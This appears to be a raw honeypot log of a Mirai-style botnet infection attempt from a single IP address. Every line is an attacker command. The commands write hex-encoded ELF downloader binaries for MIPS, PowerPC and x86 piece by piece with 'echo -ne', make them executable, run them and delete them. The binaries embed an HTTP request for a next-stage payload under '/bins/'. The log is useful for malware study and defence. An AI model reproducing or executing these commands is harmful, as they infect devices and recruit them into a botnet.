2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x8f\x99\x80\x38\x27\xb0\x00\x2c\x02\x20\x20\x21\x02\x00\x28\x21\x03\x20\xf8\x09\x24\x06\x00\x80\x8f\xbc\x00\x10\x02\x00\x28\x21\x8f\x99\x80\x48\x00\x40\x30\x21\x18\x40\x00\x06\x02\x40\x20\x21\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x10\x00\xff\xf0\x00\x00\x00\x00\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x20\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x40\x20\x21\x8f\xbc\x00\x10\x24\x04\x00\x01\x8f\x85\x80\x18\x8f\x99\x80\x48\x24\xa5\x06\x2c' >> GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00\x05\x8f\xbc\x00\x10\x8f\xbf\x00\xc0\x8f\xb3\x00\xbc\x8f\xb2\x00\xb8\x8f\xb1\x00\xb4\x8f\xb0\x00\xb0\x03\xe0\x00\x08\x27\xbd\x00\xc8\x3c\x1c\x00\x05\x27\x9c\x81\x70\x03\x99\xe0\x21\x03\xe0\x00\x21\x04\x11\x00\x01\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x81\x58\x03\x9f\xe0\x21\x00\x00\xf8\x21\x8f\x99\x80\x3c\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: echo -ne '\x3c\x1c\x00\x05\x27\x9c\x81\x30\x03\x99\xe0\x21\x00\x80\x10\x21\x00\xa0\x20\x21\x00\xc0\x28\x21\x00\xe0\x30\x21\x8f\xa7\x00\x10\x8f\xa8\x00\x14\x8f\xa9\x00\x18\x8f\xaa\x00\x1c\x27\xbd\xff\xe0\xaf\xa8\x00\x10\xaf\xa9\x00\x14\xaf\xaa\x00\x18\xaf\xa2\x00\x1c\x8f\xa2\x00\x1c\x00\x00\x00\x0c\x14\xe0\x00\x03\x27\xbd\x00\x20\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x40\x20\x21\x8f\x99\x80\x40\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x80\xc0\x03\x99\xe0\x21\x27\xbd\xff\xe0' >> GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: echo -ne '\xaf\xbf\x00\x1c\xaf\xb0\x00\x18\xaf\xbc\x00\x10\x8f\x99\x80\x34\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x80\x80\x21\x8f\xbc\x00\x10\xac\x50\x00\x00\x8f\xbf\x00\x1c\x8f\xb0\x00\x18\x24\x02\xff\xff\x03\xe0\x00\x08\x27\xbd\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x80\x70\x03\x99\xe0\x21\x8f\x82\x80\x30\x03\xe0\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\x69\x70\x73\x00\x00\x00\x00\x4d\x49\x52\x41\x49\x0a\x00\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x00\x4e\x49\x46\x0a' >> GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69\x6a\x7a\x62\x46\x6d\x69\x70\x73\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x06\xa0\x00\x40\x05\xc0\x00\x40\x01\x9c\x00\x40\x02\x10\x00\x40\x05\x70\x00\x40\x01\x28\x00\x40\x01\x74\x00\x40\x00\xa0' >> GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: echo -ne '\x00\x40\x01\xc4\x00\x40\x00\xc8\x00\x40\x00\xe4\x00\x40\x05\x00\x00\x40\x01\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67\x6f\x74\x00\x2e\x62\x73\x73\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\xa0' >> GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\xa0\x00\x00\x05\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x40\x05\xe0\x00\x00\x05\xe0\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x10\x00\x00\x03\x00\x44\x06\x40\x00\x00\x06\x40\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00\x08\x00\x00\x00\x03\x00\x44\x06\xa0\x00\x00\x06\x94\x00\x00\x00\x10' >> GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x23\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x06\x94\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x94\x00\x00\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:37:58|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:38:01|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:38:01|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:38:02|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
2020-05-21|14:38:02|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x14\x00\x00\x00\x01\x10\x00\x03\xe8\x00\x00\x00\x34\x00\x00\x04\xc0\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x04\xa0\x00\x00\x04\xa0\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x04\xa0\x10\x01\x04\xa0\x10\x01\x04\xa0\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x01\x00\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:38:02|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x54\x84\x80\x1e\x54\x63\xc0\x0e\x7c\x63\x23\x78\x54\xa5\x40\x2e\x7c\x63\x33\x78\x7c\xa3\x1b\x78\x4e\x80\x00\x20\x7c\x08\x02\xa6\x94\x21\xff\xf0\x7c\x64\x1b\x78\x38\x60\x00\x01\x90\x01\x00\x14\x4c\xc6\x31\x82\x48\x00\x03\x25\x80\x01\x00\x14\x38\x21\x00\x10\x7c\x08\x03\xa6\x4e\x80\x00\x20\x7c\x08\x02\xa6\x94\x21\xff\xf0\x7c\x64\x1b\x78\x38\x60\x00\x06\x90\x01\x00\x14\x4c\xc6\x31\x82\x48\x00\x02\xf9\x80\x01\x00\x14\x38\x21\x00\x10' >> GKMSPhsZvn
2020-05-21|14:38:02|196.53 .114.199| CMD: echo -ne '\x7c\x08\x03\xa6\x4e\x80\x00\x20\x7c\x08\x02\xa6\x94\x21\xff\xf0\x7c\xa6\x2b\x78\x90\x01\x00\x14\x7c\x80\x23\x78\x7c\x05\x03\x78\x7c\x64\x1b\x78\x38\x60\x00\x05\x4c\xc6\x31\x82\x48\x00\x02\xc1\x80\x01\x00\x14\x38\x21\x00\x10\x7c\x08\x03\xa6\x4e\x80\x00\x20\x94\x21\xff\xe0\x7c\x08\x02\xa6\x90\x61\x00\x08\x38\x60\x00\x66\x90\x81\x00\x0c\x38\x80\x00\x03\x90\xa1\x00\x10\x38\xa1\x00\x08\x90\x01\x00\x24\x4c\xc6\x31\x82\x48\x00\x02\x85\x80\x01\x00\x24\x38\x21\x00\x20\x7c\x08\x03\xa6\x4e\x80\x00\x20\x7c\x08\x02\xa6' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x94\x21\xff\xf0\x7c\xa6\x2b\x78\x90\x01\x00\x14\x7c\x80\x23\x78\x7c\x05\x03\x78\x7c\x64\x1b\x78\x38\x60\x00\x04\x4c\xc6\x31\x82\x48\x00\x02\x4d\x80\x01\x00\x14\x38\x21\x00\x10\x7c\x08\x03\xa6\x4e\x80\x00\x20\x7c\x08\x02\xa6\x94\x21\xff\xf0\x7c\xa6\x2b\x78\x90\x01\x00\x14\x7c\x80\x23\x78\x7c\x05\x03\x78\x7c\x64\x1b\x78\x38\x60\x00\x03\x4c\xc6\x31\x82\x48\x00\x02\x15\x80\x01\x00\x14\x38\x21\x00\x10\x7c\x08\x03\xa6\x4e\x80\x00\x20\x94\x21\xff\xe0\x7c\x08\x02\xa6\x90\x61\x00\x08\x38\x60\x00\x66\x90\x81\x00\x0c' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x38\x80\x00\x01\x90\xa1\x00\x10\x38\xa1\x00\x08\x90\x01\x00\x24\x4c\xc6\x31\x82\x48\x00\x01\xd9\x80\x01\x00\x24\x38\x21\x00\x20\x7c\x08\x03\xa6\x4e\x80\x00\x20\x94\x21\xff\x40\x7c\x08\x02\xa6\x3d\x20\x10\x00\xbf\x81\x00\xb0\x3b\xa9\x04\x50\x90\x01\x00\xc4\x48\x00\x00\x08\x3b\xbd\x00\x01\x88\x1d\x00\x00\x2f\x80\x00\x00\x40\x9e\xff\xf4\x3c\x80\x10\x00\x3d\x20\x10\x00\x39\x29\x04\x50\x38\x84\x04\x54\x38\xa0\x00\x06\x38\x60\x00\x01\x7f\xa9\xe8\x50\x4b\xff\xff\x0d\x38\x00\x00\x02\x38\xc0\x00\xc7\x38\x80\x00\x35' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x38\xa0\x00\x72\xb0\x01\x00\x0c\x38\x60\x00\xc4\x38\x00\x00\x50\xb0\x01\x00\x0e\x4b\xff\xfe\x01\x90\x61\x00\x10\x3c\x60\x10\x00\x38\x80\x02\x41\x38\xa0\x01\xff\x38\x63\x04\x5c\x4b\xff\xfe\x5d\x38\x80\x00\x01\x7c\x7c\x1b\x78\x38\xa0\x00\x00\x38\x60\x00\x02\x4b\xff\xff\x2d\x2f\x83\xff\xff\x7c\x7e\x1b\x78\x41\x9e\x00\x0c\x2f\x9c\xff\xff\x40\xbe\x00\x0c\x38\x60\x00\x01\x4b\xff\xfd\xd5\x7f\xc3\xf3\x78\x38\x81\x00\x0c\x38\xa0\x00\x10\x4b\xff\xfe\x55\x7c\x7f\x1b\x79\x40\xa0\x00\x20\x3c\x80\x10\x00\x38\x60\x00\x01' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x38\x84\x04\x68\x38\xa0\x00\x04\x4b\xff\xfe\x75\x7c\x7f\x00\xd0\x4b\xff\xfd\xa1\x3b\xbd\x00\x1d\x3c\x80\x10\x00\x38\x84\x04\x70\x7f\xc3\xf3\x78\x7f\xa5\xeb\x78\x4b\xff\xfe\x55\x7f\x83\xe8\x00\x41\x9e\x00\x0c\x38\x60\x00\x03\x4b\xff\xfd\x79\x3b\xa0\x00\x00\x38\x81\x00\x08\x38\xa0\x00\x01\x7f\xc3\xf3\x78\x4b\xff\xfe\x69\x2f\x83\x00\x01\x38\x60\x00\x04\x41\x9e\x00\x08\x4b\xff\xfd\x55\x89\x61\x00\x08\x57\xa9\x40\x2e\x3c\x00\x0d\x0a\x7d\x3d\x5b\x78\x60\x00\x0d\x0a\x7f\x9d\x00\x00\x40\x9e\xff\xc8\x3b\xa1\x00\x1c' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x38\xa0\x00\x80\x7f\xa4\xeb\x78\x7f\xc3\xf3\x78\x4b\xff\xfe\x29\x7f\xa4\xeb\x78\x7c\x65\x1b\x79\x7f\x83\xe3\x78\x40\x81\x00\x0c\x4b\xff\xfd\xdd\x4b\xff\xff\xd8\x7f\xc3\xf3\x78\x4b\xff\xfd\x31\x7f\x83\xe3\x78\x4b\xff\xfd\x29\x3c\x80\x10\x00\x38\x84\x04\x98\x38\xa0\x00\x04\x38\x60\x00\x01\x4b\xff\xfd\xb5\x38\x60\x00\x05\x4b\xff\xfc\xe1\x80\x01\x00\xc4\xbb\x81\x00\xb0\x38\x21\x00\xc0\x7c\x08\x03\xa6\x4e\x80\x00\x20\x4b\xff\xfe\x40\x7c\x60\x1b\x78\x7c\x83\x23\x78\x7c\xa4\x2b\x78\x7c\xc5\x33\x78\x7c\xe6\x3b\x78' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x7d\x07\x43\x78\x44\x00\x00\x02\x4c\x83\x00\x20\x48\x00\x00\x04\x7c\x08\x02\xa6\x94\x21\xff\xe0\xbf\xa1\x00\x14\x7c\x7d\x1b\x78\x90\x01\x00\x24\x48\x00\x00\x21\x93\xa3\x00\x00\x38\x60\xff\xff\x80\x01\x00\x24\xbb\xa1\x00\x14\x38\x21\x00\x20\x7c\x08\x03\xa6\x4e\x80\x00\x20\x3c\x60\x10\x01\x38\x63\x04\xa0\x4e\x80\x00\x20\x70\x70\x63\x00\x4d\x49\x52\x41\x49\x0a\x00\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x6a\x7a\x62\x46\x70\x70\x63\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x73\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x10\x00\x00\x94\x00\x00\x00\x94\x00\x00\x03\xbc' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x10\x00\x04\x50\x00\x00\x04\x50\x00\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x10\x01\x04\xa0\x00\x00\x04\xa0\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xa0\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x01\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:38:03|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:38:06|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:38:07|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:38:08|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x21\x83\x04\x08\x34\x00\x00\x00\x40\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x08\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xbe\x03\x00\x00\xbe\x03\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xc0\x03\x00\x00\xc0\x93\x04\x08\xc0\x93\x04\x08\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x55\x89\xe5\x0f\xb6\x55\x08\x0f\xb6\x45\x0c\xc1\xe2\x18\xc1\xe0\x10\x09\xc2\x0f\xb6\x4d\x10\x0f\xb6\x45\x14\xc1\xe1\x08\x09\xc2\x09\xd1\x5d\x89\xca\x89\xc8\xc1\xe0\x18\x81\xe2\x00\xff\x00\x00\xc1\xe2\x08\x09\xd0\x89\xca\xc1\xea\x18\x81\xe1\x00\x00\xff\x00\xc1\xe9\x08\x09\xca\x09\xd0\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x01\xe8\x40\x02\x00\x00\x83\xc4\x10\xc9\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x06\xe8\x2b\x02\x00' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\x13\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03\x6a\x66\xe8\xec\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x04\xe8\xd4\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x03\xe8\xbc\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x95\x01\x00\x00\xc9\xc3\x55\xb8\x79\x83\x04\x08\x89\xe5\x57\x56\x53\x81\xec\xac\x00\x00\x00\xeb\x01\x40\x80\x38\x00\x75\xfa\x2d\x79\x83\x04\x08\x89\x85\x50\xff\xff\xff\x50\x6a\x06\x68\x7d\x83\x04\x08\x6a\x01\xe8\x76\xff\xff\xff\x68\xc7\x00\x00\x00\x66\xc7\x45\xe0\x02\x00\x6a\x72\x66\xc7\x45\xe2\x00\x50\x6a\x35\x68\xc4\x00\x00\x00\xe8\xa9\xfe\xff\xff\x83\xc4\x1c\x89\x45\xe4\x68\xff\x01\x00\x00\x68\x41\x02\x00\x00\x68\x84\x83\x04\x08' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\xe8\xfe\xfe\xff\xff\x83\xc4\x0c\x89\xc7\x6a\x00\x6a\x01\x6a\x02\xe8\x5d\xff\xff\xff\x83\xc4\x10\x89\xc6\x83\xf8\xff\x74\x05\x83\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xae\xfe\xff\xff\x83\xc4\x10\x50\x8d\x45\xe0\x6a\x10\x50\x56\xe8\xdd\xfe\xff\xff\x83\xc4\x10\x89\xc3\x85\xc0\x79\x1c\xf7\xdb\x50\x6a\x04\x68\x8f\x83\x04\x08\x6a\x01\xe8\xea\xfe\xff\xff\x89\x1c\x24\xe8\x7c\xfe\xff\xff\x83\xc4\x10\x8b\x9d\x50\xff\xff\xff\x50\x83\xc3\x1d\x53\x68\x94\x83\x04\x08\x56\xe8\xc9\xfe\xff\xff\x83\xc4\x10\x39\xd8\x74\x0d' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x83\xec\x0c\x6a\x03\xe8\x52\xfe\xff\xff\x83\xc4\x10\x31\xdb\x50\x8d\x45\xf3\x6a\x01\x50\x56\xe8\xbe\xfe\xff\xff\x83\xc4\x10\x48\x74\x0d\x83\xec\x0c\x6a\x04\xe8\x30\xfe\xff\xff\x83\xc4\x10\x0f\xbe\x45\xf3\xc1\xe3\x08\x09\xc3\x81\xfb\x0a\x0d\x0a\x0d\x75\xcf\x8d\x9d\x60\xff\xff\xff\x51\x68\x80\x00\x00\x00\x53\x56\xe8\x87\xfe\xff\xff\x83\xc4\x10\x85\xc0\x7e\x0e\x52\x50\x53\x57\xe8\x5f\xfe\xff\xff\x83\xc4\x10\xeb\xd8\x83\xec\x0c\x56\xe8\x00\xfe\xff\xff\x89\x3c\x24\xe8\xf8\xfd\xff\xff\x83\xc4\x0c\x6a\x04\x68\xb9' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x83\x04\x08\x6a\x01\xe8\x38\xfe\xff\xff\xc7\x04\x24\x05\x00\x00\x00\xe8\xc6\xfd\xff\xff\x83\xc4\x10\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x55\x89\xe5\x5d\xe9\x6f\xfe\xff\xff\x90\x90\x55\x57\x56\x53\x8b\x6c\x24\x2c\x8b\x7c\x24\x28\x8b\x74\x24\x24\x8b\x54\x24\x20\x8b\x4c\x24\x1c\x8b\x5c\x24\x18\x8b\x44\x24\x14\xcd\x80\x5b\x5e\x5f\x5d\x3d\x01\xf0\xff\xff\x0f\x83\x01\x00\x00\x00\xc3\x83\xec\x0c\x89\xc2\xf7\xda\xe8\x09\x00\x00\x00\x89\x10\x83\xc8\xff\x83\xc4\x0c\xc3\xb8\xc0\x93\x04\x08\xc3\x78\x38\x36\x00\x4d\x49\x52' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x41\x49\x0a\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x4e\x49\x46\x0a\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69\x6a\x7a\x62\x46\x78\x38\x36\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55\x29\x20\x34\x2e\x31\x2e\x32\x00\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55\x29\x20\x34\x2e\x31\x2e\x32\x00\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55\x29\x20\x34\x2e\x31\x2e\x32\x00\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x29\x20\x34\x2e\x31\x2e\x32\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x2e\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x94\x80\x04\x08\x94\x00\x00\x00\xe5\x02\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x79\x83\x04\x08\x79\x03\x00\x00\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x29\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\xc0\x93\x04\x08\xc0\x03\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x2e\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x01\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x04\x00\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x05\x00\x00\x10\x02\x00\x00\x07\x00\x00\x00\x0d\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x07\x00\x00\x15\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x80\x04\x08\x00\x00\x00\x00\x03\x00\x01\x00\x00\x00\x00\x00\x79\x83\x04\x08\x00\x00\x00\x00\x03\x00\x02\x00\x00\x00\x00\x00\xc0\x93\x04\x08\x00\x00\x00\x00\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x07\x00' >> GKMSPhsZvn
